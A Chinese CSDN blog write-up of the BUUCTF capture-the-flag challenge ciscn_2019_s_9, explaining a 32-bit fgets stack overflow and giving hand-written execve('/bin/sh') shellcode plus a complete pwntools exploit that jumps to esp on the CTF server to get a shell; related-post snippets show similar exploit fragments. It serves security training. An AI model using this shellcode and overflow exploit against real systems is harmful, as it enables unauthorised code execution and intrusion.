[BUUCTF]PWN——ciscn_2019_s_9

最新推荐文章于 2025-05-19 23:44:53 发布
最新推荐文章于 2025-05-19 23:44:53 发布
阅读量630 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BangSen1/article/details/116172469
该博客详细介绍了如何在32位环境下,利用IDA分析程序,发现fgets函数可能导致的栈溢出漏洞。由于系统未开启NX保护,作者通过编写长度合适的shellcode并将其写入栈中,设置返回地址跳转到shellcode执行,从而实现远程shell的获取。整个过程涉及到逆向工程、栈溢出利用和shellcode构造等技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ciscn_2019_s_9

参考
例行检查 ,32位,未开启任何保护
在这里插入图片描述
运行一下。
在这里插入图片描述
32位ida载入,,第10行的fgets,能够溢出0x32-0x20-0x4个字节在这里插入图片描述
没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode
生成的shellcode的长度过长,参数 s0x20(32) 写不下。

shellcode ='''
xor eax,eax             #eax置0
xor edx,edx				#edx置0
push edx				#将0入栈,标记了”/bin/sh”的结尾
push 0x68732f2f         #传递”/sh”,为了4字节对齐,使用//sh,这在execve()中等同于/sh
push 0x6e69622f         #传递“/bin”
mov ebx,esp             #此时esp指向了”/bin/sh”,通过esp将该字符串的值传递给ebx
xor ecx,ecx
mov al,0xB              #eax置为execve函数的中断号
int 0x80                #调用软中断
'''
shellcode=asm(shellcode)

这样写shellcode的长度只有23,能够写入栈
将返回地址写成jump_esp,重新跳到栈上,手动写入sub esp,40;call esp开栈执行,即可获取shell

from pwn import *

p=remote('node3.buuoj.cn',29455)
context(log_level='debug',arch='i386',os='linux')

jump_esp=0x8048554
shellcode='''
xor eax,eax
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
mov al,0xB
int 0x80
'''

shellcode=asm(shellcode)
print len(shellcode)  #23

#shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"

payload=shellcode.ljust(0x24,'\x00')+p32(jump_esp)
print len(payload)  # 40

payload+=asm("sub esp,40;call esp")

p.sendline(payload)
p.interactive()

在这里插入图片描述

buuctfciscn_2019_c_1
weixin_54452942的博客
04-18 900
通俗易懂
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 691
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
[buuctf]ciscn_2019_s_9
逆向萌新的博客
07-15 1153
[buuctf]ciscn_2019_s_9
BUUCTF PWN刷题笔记(持续更新!!)
最新发布
wlmt666的博客
05-19 1067
64位,没有开启保护。点进去没发现明显的漏洞函数,考虑泄露libc基地址的rop构造。先看看有多少gadget估计也够用了。puts函数只接受一个参数,观看汇编看看用的哪个寄存器传输的参数。用的是edi。但是我们怎么找到so的版本呢,因为我们必须要知道so文件种puts函数的偏移量,才可以和泄露出puts的地址结合找到基址。可以用LibcSearch模块来搜索。libcsearch(符号,地址)新的心得:1.64位有效地址是6字节。2.libc.dump是LibcSearch的内置函数。
[BUUCTF] ciscn_2019_s_9
zyxx_wjc的博客
07-10 343
ciscn_2019_s_9
BUUCTF PWN ciscn_2019_s_9
Rt1Text的博客
04-22 320
1.checksec+运行 32位/没有保护 2.32IDA进行中 1.hint函数 提示函数,很有帮助,解题关键点 直接跳到esp栈顶指针 2.pwn函数 明显的fgets()函数溢出 跟进s看看偏移 offset = 0x20+4 向s里写入shellcode 注意一点: 如果直接用pwntools生成的shellcode,会很长,s里写不下 所以这就需要我们优化shellcode的长度 shellcode =''' xor eax,eax ..
ciscn_2019_s_9
K1ose的博客
04-22 925
下载附件,file一下,是32bit程序; checksec一下; 基本没保护措施; IDA里分析一波; main()跳到pwn(); 看看pwn()的内容; 看到fgets立马想到栈溢出; 又注意到有一个hint()函数; 其内容如下: 这里直接跳到了$esp,$esp是在堆栈上的; 既然有栈溢出,栈可执行,又有一个跳转到$esp的函数,思路就很清晰了; 我们先利用栈溢出,覆盖pwn()函数的返回地址为jmp esp的地址,然后我们再使得$esp指向shellcode所在的地址,完美! 但是因为
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 1139
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
buuctf pwn刷题(1)
清霂的博客
01-30 1275
目录1.test_your_nc2.pwn13.warmup_csaw_2016 1.test_your_nc 先用exeinfo查壳,是64位的程序 用64位ida静态分析一下,找到main函数 F5反汇编,看到system("/bin/sh") system()的作用———执行shell命令也就是向dos发送一条指令。 即执行/bin/sh命令,获得shell权限 用虚拟机连node3.buuoj.cn:27191 nc node3.buuoj.cn 27191 查看文件目录 ls 查看flag
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2457
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
[BUUCTF]PWN——ciscn_2019_s_9(汇编代码写shellcode)
mcmuyanga的博客
01-28 1967
ciscn_2019_s_9 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行看一下程序大概的情况 32位ida载入,第10行的fgets,能够溢出0x32-0x20-0x4个字节 由于没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode,s在栈上,ida里有一个函数,为我们提供了跳转到栈上的指令jmp esp 现在就一个问题,s大小只有0x20,用下面的shellcode不懂能不能完全写入 context(log_level = 'debu
BUUCTF之“ciscn_2019_s_9”见32位shellcode的简单写法,以及其中的难解之处
Probeginner的博客
12-09 332
32位简单shellcode
BUUCTF ciscn_2019_s_9
2401_85052854的博客
03-23 346
通过观察,在ret中执行的jmp esp的操作,指向的是我们最后写上“sub esp,40;call esp”这样的操作,shellcode的位置距离现在的esp为0x28,也就是40,所以要进行“sub esp,40;有个jmp esp的操作,我们可以利用这个指令直接跳转到我们从栈上写入shellcode的位置进行getshell,通过观察栈上的空间太少,pwntool生成的shellcode太长,我们只能手写短一点的shellcode了,以下是exp。checksec一下发现什么保护都没开。
ciscn_2019_s_9详解
勿山几已
06-12 529
详解pwn入门题ciscn_2019_s_9
ciscn_2019_s_9 1
weixin_74861133的博客
03-25 208
fgets处能栈溢出,然后我们发现可疑函数hint()这个函数会直接跳转到esp处执行,我们可以在栈溢出时将返回地址溢出到该函数处,到时候函数执行返回指令ret(pop eip)时esp会-4,跳转到hint函数时会jmp到esp(返回地址的下一个位置),我们可以在这个位置随意构造汇编指令。所以首先我们可以在s开始的位置就将shellcode写入,手搓shellcode的长度也就32,然后通过上面的思路,构造汇编指令时可以构造sub esp,40;
BUUCTF pwn
L0g1c的博客
01-30 1838
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值